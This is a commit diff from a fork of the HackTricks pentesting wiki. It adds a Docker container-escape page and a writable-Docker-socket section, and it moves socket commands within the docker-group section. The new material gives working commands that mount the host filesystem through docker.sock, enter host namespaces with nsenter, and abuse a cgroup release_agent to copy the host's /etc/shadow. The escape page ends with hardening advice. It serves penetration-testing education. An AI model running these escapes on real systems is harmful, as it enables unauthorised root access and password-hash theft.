coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [master] 366 pages modified

Browse Source
This commit is contained in:
CPol 2020-08-26 15:52:43 +00:00 committed by gitbook-bot
parent 8e8e204398
commit 6283f1edf1
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
4 changed files with 59 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
SUMMARY.md
View File

@ -20,6 +20,7 @@
* [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md) * [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md)
* [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md) * [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md)
* [Escaping from a Docker container](linux-unix/privilege-escalation/escaping-from-a-docker-container.md)
* [Cisco - vmanage](linux-unix/privilege-escalation/cisco-vmanage.md) * [Cisco - vmanage](linux-unix/privilege-escalation/cisco-vmanage.md)
* [D-Bus Enumeration & Command Injection Privilege Escalation](linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md) * [D-Bus Enumeration & Command Injection Privilege Escalation](linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md)
* [Escaping from restricted shells - Jails](linux-unix/privilege-escalation/escaping-from-limited-bash.md) * [Escaping from restricted shells - Jails](linux-unix/privilege-escalation/escaping-from-limited-bash.md)

13
linux-unix/privilege-escalation/README.md
View File

@ -463,6 +463,19 @@ curl --max-time 2 --unix-socket /pat/to/socket/files http:/index
If the socket **respond with a HTTP** request, then you can **communicate** with it and maybe **exploit some vulnerability**. If the socket **respond with a HTTP** request, then you can **communicate** with it and maybe **exploit some vulnerability**.
### Writable Docker Socket
The **docker socke**t is typically located at `/var/run/docker.sock` and is only writable by `root` user and `docker` group.
If for some reason **you have write permissions** over that socket you can escalate privileges.
The following commands can be used to escalate privileges:
```bash
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
```
Note that if you have write permissions over socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group).
## **D-Bus** ## **D-Bus**
D-BUS is an **inter-process communication \(IPC\) system**, providing a simple yet powerful mechanism **allowing applications to talk to one another**, communicate information and request services. D-BUS was designed from scratch to fulfil the needs of a modern Linux system. D-BUS is an **inter-process communication \(IPC\) system**, providing a simple yet powerful mechanism **allowing applications to talk to one another**, communicate information and request services. D-BUS was designed from scratch to fulfil the needs of a modern Linux system.

42
linux-unix/privilege-escalation/escaping-from-a-docker-container.md Normal file
View File

@ -0,0 +1,42 @@
# Escaping from a Docker container
### SYS\_ADMIN capability and AppArmor disabled
{% hint style="info" %}
Note that these aren't default settings
{% endhint %}
```text
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
```
Then in the container, we are going to run these commands.
```text
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n s/.*\perdir=\([^,]*\).*/\1/p /etc/mtab`
echo “$host_path/cmd” > /tmp/cgrp/release_agent
echo #!/bin/sh > /cmd
echo “cat /etc/shadow > $host_path/shadow” >> /cmd
chmod a+x /cmd
sh -c “echo \$\$ > /tmp/cgrp/x/cgroup.procs”
```
Once you execute the above commands, you can see the host OSs passwords in /shadow folder
```text
cat /shadow
```
As we can see we were able to break out of the container. Suffice to say, we abused misconfigurations to escape a container.
This wouldnt have happened if the non-root user was used, SYS\_ADMIN and AppArmor profile wasnt disabled.
In short,
1. Do not use privileged flag, it disables all the security mechanisms placed by docker.
2. Do not mount root volumes into the containers.
3. Do not mount docker.sock inside the containers.
4. Default docker settings are sane, please do not disable them or add more capabilities.
5. Use SecComp and AppArmor profiles to harden the container.
6. Do not run containers as the root user.

11
linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md
View File

@ -158,7 +158,9 @@ find / -group root -perm -g=w 2>/dev/null
## Docker Group ## Docker Group
You can mount the root filesystem of the host machine to an instances volume, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine. You can **mount the root filesystem of the host machine to an instances volume**, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine.
You can start reading [**this post about how to escalate privileges abusing the docker socket where you have write permissions**](../#writable-docker-socket).
{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} {% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}
@ -197,13 +199,6 @@ sh-5.0# id
uid=0(root) gid=0(root) groups=0(root) uid=0(root) gid=0(root) groups=0(root)
``` ```
More docker privilege escalation using the Docker Socket.
```text
sudo docker -H unix:///google/host/var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
sudo docker -H unix:///google/host/var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
```
## lxc/lxd Group ## lxc/lxd Group
{% page-ref page="./" %} {% page-ref page="./" %}